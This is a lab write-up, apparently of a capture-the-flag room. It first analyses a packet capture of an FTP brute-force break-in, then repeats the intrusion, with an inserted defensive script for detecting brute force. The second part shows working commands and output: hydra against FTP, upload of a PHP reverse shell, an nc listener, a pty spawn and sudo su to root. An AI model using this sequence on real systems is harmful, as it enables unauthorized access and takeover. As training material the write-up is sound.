
h4cked

Find out what happened while analyzing a .pcap file and hack your way into the machine.

Task 1: Oh no! We've been hacked!

To hide the SYN and ACK segments that carry no data of interest, use the display filter frame.len != 66 and frame.len != 74. This tells Wireshark not to show frames whose size is 66 or 74 bytes; in my case those were the sizes of the segments that were of no use to me at all.

This way everything is cleaner and "prettier" to the eyes.

The attacker is trying to log into a specific service. What service is this?

ftp

Here we see how the attacker is trying to log in.

There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?

hydra

The attacker is trying to log on with a specific username. What is the username?

jenny

It can be seen in the USER field.

What is the user's password?

password123

Here we see that, after the user enters the password "password123", the system replies with "Login successful".
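As an added defender-side example (not part of the original write-up), the following Python script reconstructs FTP login attempts from control-channel text such as Wireshark's "Follow TCP Stream" output and flags the brute-force pattern seen above; the sample sessions, the failure threshold and the function names are constructed for this example, not taken from the real capture.

```python
# Added example (not from the original write-up): flag FTP brute-force
# activity in reconstructed FTP control streams (what Wireshark's
# "Follow TCP Stream" shows for port 21). The sessions below are constructed.
from collections import defaultdict

# hydra runs parallel connections ("max 16 tasks" in Task 2), so evidence is
# aggregated per username across all streams, not judged per stream.
SAMPLE_STREAMS = {
    0: "220 Hello FTP World!\r\nUSER jenny\r\n331 Please specify the password.\r\n"
       "PASS 123456\r\n530 Login incorrect.\r\nUSER jenny\r\n331 Please specify "
       "the password.\r\nPASS 12345\r\n530 Login incorrect.\r\n",
    1: "220 Hello FTP World!\r\nUSER jenny\r\n331 Please specify the password.\r\n"
       "PASS password123\r\n230 Login successful.\r\nPWD\r\n"
       '257 "/var/www/html" is the current directory\r\n',
}


def parse_stream(text):
    """Yield (user, password, outcome) for each login attempt in one stream."""
    user = password = None
    for line in text.splitlines():
        if line.startswith("USER "):
            user = line[5:].strip()
        elif line.startswith("PASS "):
            password = line[5:]
        elif line[:3] in ("530", "230") and user is not None:
            # RFC 959 reply codes: 530 = not logged in, 230 = user logged in
            yield user, password, "success" if line[:3] == "230" else "fail"
            password = None


def detect_bruteforce(streams, threshold=2):
    """Per-username summary; 'bruteforce' is set once failures reach threshold."""
    stats = defaultdict(lambda: {"failed": 0, "success_password": None})
    for text in streams.values():
        for user, password, outcome in parse_stream(text):
            if outcome == "fail":
                stats[user]["failed"] += 1
            else:
                stats[user]["success_password"] = password
    return {u: dict(s, bruteforce=s["failed"] >= threshold) for u, s in stats.items()}


if __name__ == "__main__":
    for user, summary in detect_bruteforce(SAMPLE_STREAMS).items():
        print(user, summary)
```

On a real capture, export each port-21 conversation (tcp.stream) as text and pass them as the dictionary values; the threshold of 2 is deliberately low for the sample and should be tuned to the environment.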

What is the current FTP working directory after the attacker logged in?

/var/www/html

When the attacker runs the "pwd" command, we can see that the server replies with "/var/www/html".

The attacker uploaded a backdoor. What is the backdoor's filename?

shell.php

The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

http://pentestmonkey.net/tools/php-reverse-shell

Which command did the attacker manually execute after getting a reverse shell?

whoami

What is the computer's hostname?

wir3

Which command did the attacker execute to spawn a new TTY shell?

python3 -c 'import pty; pty.spawn("/bin/bash")'

Which command was executed to gain a root shell?

sudo su

The attacker downloaded something from GitHub. What is the name of the GitHub project?

reptile

The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?

rootkit

Task 2: Hack your way back into the machine

  1. Since the previous hacker changed the password, we have to brute force FTP with hydra.

$ hydra -l jenny -P /usr/share/wordlists/rockyou.txt 10.10.28.43 ftp
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-19 17:25:56
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.28.43:21/
[21][ftp] host: 10.10.28.43   login: jenny   password: 987654321
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-19 17:26:44

We see that the password is 987654321.

  2. We connect with those credentials, upload our shell with the put command, and make it executable with chmod 777.

$ ftp 10.10.28.43
Connected to 10.10.28.43.
220 Hello FTP World!
Name (10.10.28.43:rulo): jenny
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||36440|)
150 Here comes the directory listing.
drwxr-xr-x    2 1000     1000         4096 May 19 20:39 .
drwxr-xr-x    3 0        0            4096 Feb 01  2021 ..
-rw-r--r--    1 1000     1000        10918 Feb 01  2021 index.html
-rwxrwxrwx    1 1000     1000         5493 Feb 01  2021 shell.php
226 Directory send OK.
ftp> put shellknz.php
local: shellknz.php remote: shellknz.php
229 Entering Extended Passive Mode (|||45093|)
150 Ok to send data.
100% |***************************************************************************|  2583       19.09 MiB/s    00:00 ETA
226 Transfer complete.
2583 bytes sent in 00:00 (5.17 KiB/s)
ftp> chmod 777 shellknz.php
200 SITE CHMOD command ok.
ftp> quit
221 Goodbye.
  3. We start a listener with nc -lvnp 6666 and open our shell in the browser so that it runs and gives us the reverse shell.

  4. Now all that's left is to upgrade to a TTY with python3 -c 'import pty; pty.spawn("/bin/bash")'; after that we switch to the user jenny with the same FTP credentials, and with sudo su we become root.
